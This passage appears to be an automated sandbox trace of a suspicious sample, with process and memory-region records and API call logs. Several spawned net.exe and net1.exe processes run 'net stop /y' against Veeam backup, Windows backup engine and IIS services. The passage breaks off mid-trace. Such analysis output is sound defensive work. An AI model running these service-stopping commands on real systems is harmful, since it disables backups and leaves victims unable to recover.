parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop VeeamTransportSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12435 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12436 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12437 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12438 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 12439 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12440 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12441 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12442 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 12443 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12444 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12445 start_va = 0x7fffffd7000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 12446 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 12447 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12448 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 12449 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12450 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12451 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12452 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12453 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 885 os_tid = 0xd18 Process: id = "353" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x747ac000" os_pid = "0x9a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop W3Svc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12454 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12455 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12456 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12457 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 12458 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12459 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12460 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12461 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 12462 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12463 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12464 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 12465 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 12466 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12467 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12468 start_va = 0x340000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 12469 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12470 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12471 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12472 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 887 os_tid = 0xd08 Process: id = "354" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x511cc000" os_pid = "0xbd8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop wbengine /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12489 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12490 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12491 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12492 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 12493 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12494 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12495 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12496 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 12497 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12498 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12499 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 12500 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 12501 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12502 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12503 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 12504 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12505 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12506 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12507 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 889 os_tid = 0x774 Process: id = "355" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5017b000" os_pid = "0x7e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "347" os_parent_pid = "0x81c" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamNFSSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 12510 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 12511 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 12512 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 12513 start_va = 0x90000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 12514 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 12515 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 12516 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 12517 start_va = 0xff1c0000 end_va = 0xff1f2fff entry_point = 0xff1c0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 12518 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 12519 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 12520 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 12521 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 12522 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12523 start_va = 0x110000 end_va = 0x176fff entry_point = 0x110000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12524 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 12525 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12526 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 12527 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 12528 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12541 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 12542 start_va = 0x50000 end_va = 0x5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 12543 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 12544 start_va = 0x7fef4380000 end_va = 0x7fef4391fff entry_point = 0x7fef4380000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 12545 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 12546 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 12547 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 12548 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 12549 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 12550 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 12551 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 12552 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 12553 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 12554 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12555 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 12556 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 12557 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 12558 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 12559 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 12560 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 891 os_tid = 0xc68 [0119.479] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10f890 | out: lpSystemTimeAsFileTime=0x10f890*(dwLowDateTime=0xfc557ed0, dwHighDateTime=0x1d48689)) [0119.479] GetCurrentProcessId () returned 0x7e0 [0119.479] GetCurrentThreadId () returned 0xc68 [0119.479] GetTickCount () returned 0x2784a [0119.479] QueryPerformanceCounter (in: lpPerformanceCount=0x10f898 | out: lpPerformanceCount=0x10f898*=1816639700000) returned 1 [0119.480] GetModuleHandleW (lpModuleName=0x0) returned 0xff1c0000 [0119.480] __set_app_type (_Type=0x1) [0119.480] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff1d9c9c) returned 0x0 [0119.480] __getmainargs (in: _Argc=0xff1e4780, _Argv=0xff1e4790, _Env=0xff1e4788, _DoWildCard=0, _StartInfo=0xff1e479c | out: _Argc=0xff1e4780, _Argv=0xff1e4790, _Env=0xff1e4788) returned 0 [0119.480] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0119.480] GetConsoleOutputCP () returned 0x1b5 [0119.481] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff1ecec0 | out: lpCPInfo=0xff1ecec0) returned 1 [0119.481] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0119.483] sprintf_s (in: _DstBuf=0x10f838, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0119.483] setlocale (category=0, locale=".437") returned="English_United States.437" [0119.485] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0119.485] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0119.485] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamNFSSvc /y" [0119.485] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x10f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0119.485] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0119.485] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x10f828 | out: Buffer=0x10f828*=0x274d50) returned 0x0 [0119.485] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x10f828 | out: Buffer=0x10f828*=0x27c100) returned 0x0 [0119.485] _fileno (_File=0x7fefdba2a80) returned 0 [0119.485] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0119.486] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0119.486] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0119.486] _wcsicmp (_String1="config", _String2="stop") returned -16 [0119.486] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0119.486] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0119.486] _wcsicmp (_String1="file", _String2="stop") returned -13 [0119.486] _wcsicmp (_String1="files", _String2="stop") returned -13 [0119.486] _wcsicmp (_String1="group", _String2="stop") returned -12 [0119.486] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0119.486] _wcsicmp (_String1="help", _String2="stop") returned -11 [0119.486] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0119.486] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0119.486] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0119.486] _wcsicmp (_String1="session", _String2="stop") returned -15 [0119.486] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0119.486] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0119.486] _wcsicmp (_String1="share", _String2="stop") returned -12 [0119.486] _wcsicmp (_String1="start", _String2="stop") returned -14 [0119.486] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0119.486] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0119.486] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0119.486] _wcsicmp (_String1="accounts", _String2="VeeamNFSSvc") returned -21 [0119.486] _wcsicmp (_String1="computer", _String2="VeeamNFSSvc") returned -19 [0119.486] _wcsicmp (_String1="config", _String2="VeeamNFSSvc") returned -19 [0119.486] _wcsicmp (_String1="continue", _String2="VeeamNFSSvc") returned -19 [0119.486] _wcsicmp (_String1="cont", _String2="VeeamNFSSvc") returned -19 [0119.486] _wcsicmp (_String1="file", _String2="VeeamNFSSvc") returned -16 [0119.486] _wcsicmp (_String1="files", _String2="VeeamNFSSvc") returned -16 [0119.487] _wcsicmp (_String1="group", _String2="VeeamNFSSvc") returned -15 [0119.487] _wcsicmp (_String1="groups", _String2="VeeamNFSSvc") returned -15 [0119.487] _wcsicmp (_String1="help", _String2="VeeamNFSSvc") returned -14 [0119.487] _wcsicmp (_String1="helpmsg", _String2="VeeamNFSSvc") returned -14 [0119.487] _wcsicmp (_String1="localgroup", _String2="VeeamNFSSvc") returned -10 [0119.487] _wcsicmp (_String1="pause", _String2="VeeamNFSSvc") returned -6 [0119.487] _wcsicmp (_String1="session", _String2="VeeamNFSSvc") returned -3 [0119.487] _wcsicmp (_String1="sessions", _String2="VeeamNFSSvc") returned -3 [0119.487] _wcsicmp (_String1="sess", _String2="VeeamNFSSvc") returned -3 [0119.487] _wcsicmp (_String1="share", _String2="VeeamNFSSvc") returned -3 [0119.487] _wcsicmp (_String1="start", _String2="VeeamNFSSvc") returned -3 [0119.487] _wcsicmp (_String1="stats", _String2="VeeamNFSSvc") returned -3 [0119.487] _wcsicmp (_String1="statistics", _String2="VeeamNFSSvc") returned -3 [0119.487] _wcsicmp (_String1="stop", _String2="VeeamNFSSvc") returned -3 [0119.487] _wcsicmp (_String1="time", _String2="VeeamNFSSvc") returned -2 [0119.487] _wcsicmp (_String1="user", _String2="VeeamNFSSvc") returned -1 [0119.487] _wcsicmp (_String1="users", _String2="VeeamNFSSvc") returned -1 [0119.487] _wcsicmp (_String1="msg", _String2="VeeamNFSSvc") returned -9 [0119.487] _wcsicmp (_String1="messenger", _String2="VeeamNFSSvc") returned -9 [0119.487] _wcsicmp (_String1="receiver", _String2="VeeamNFSSvc") returned -4 [0119.487] _wcsicmp (_String1="rcv", _String2="VeeamNFSSvc") returned -4 [0119.487] _wcsicmp (_String1="netpopup", _String2="VeeamNFSSvc") returned -8 [0119.487] _wcsicmp (_String1="redirector", _String2="VeeamNFSSvc") returned -4 [0119.487] _wcsicmp (_String1="redir", _String2="VeeamNFSSvc") returned -4 [0119.487] _wcsicmp (_String1="rdr", _String2="VeeamNFSSvc") returned -4 [0119.487] _wcsicmp (_String1="workstation", _String2="VeeamNFSSvc") returned 1 [0119.487] _wcsicmp (_String1="work", _String2="VeeamNFSSvc") returned 1 [0119.487] _wcsicmp (_String1="wksta", _String2="VeeamNFSSvc") returned 1 [0119.487] _wcsicmp (_String1="prdr", _String2="VeeamNFSSvc") returned -6 [0119.487] _wcsicmp (_String1="devrdr", _String2="VeeamNFSSvc") returned -18 [0119.487] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamNFSSvc") returned -10 [0119.488] _wcsicmp (_String1="server", _String2="VeeamNFSSvc") returned -3 [0119.488] _wcsicmp (_String1="svr", _String2="VeeamNFSSvc") returned -3 [0119.488] _wcsicmp (_String1="srv", _String2="VeeamNFSSvc") returned -3 [0119.488] _wcsicmp (_String1="lanmanserver", _String2="VeeamNFSSvc") returned -10 [0119.488] _wcsicmp (_String1="alerter", _String2="VeeamNFSSvc") returned -21 [0119.488] _wcsicmp (_String1="netlogon", _String2="VeeamNFSSvc") returned -8 [0119.488] _wcsupr (in: _String="VeeamNFSSvc" | out: _String="VEEAMNFSSVC") returned="VEEAMNFSSVC" [0119.488] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x27ce10 [0119.492] GetServiceKeyNameW (in: hSCManager=0x27ce10, lpDisplayName="VEEAMNFSSVC", lpServiceName=0xff1e5750, lpcchBuffer=0x10f748 | out: lpServiceName="", lpcchBuffer=0x10f748) returned 0 [0119.493] _wcsicmp (_String1="msg", _String2="VEEAMNFSSVC") returned -9 [0119.493] _wcsicmp (_String1="messenger", _String2="VEEAMNFSSVC") returned -9 [0119.493] _wcsicmp (_String1="receiver", _String2="VEEAMNFSSVC") returned -4 [0119.493] _wcsicmp (_String1="rcv", _String2="VEEAMNFSSVC") returned -4 [0119.493] _wcsicmp (_String1="redirector", _String2="VEEAMNFSSVC") returned -4 [0119.493] _wcsicmp (_String1="redir", _String2="VEEAMNFSSVC") returned -4 [0119.493] _wcsicmp (_String1="rdr", _String2="VEEAMNFSSVC") returned -4 [0119.493] _wcsicmp (_String1="workstation", _String2="VEEAMNFSSVC") returned 1 [0119.493] _wcsicmp 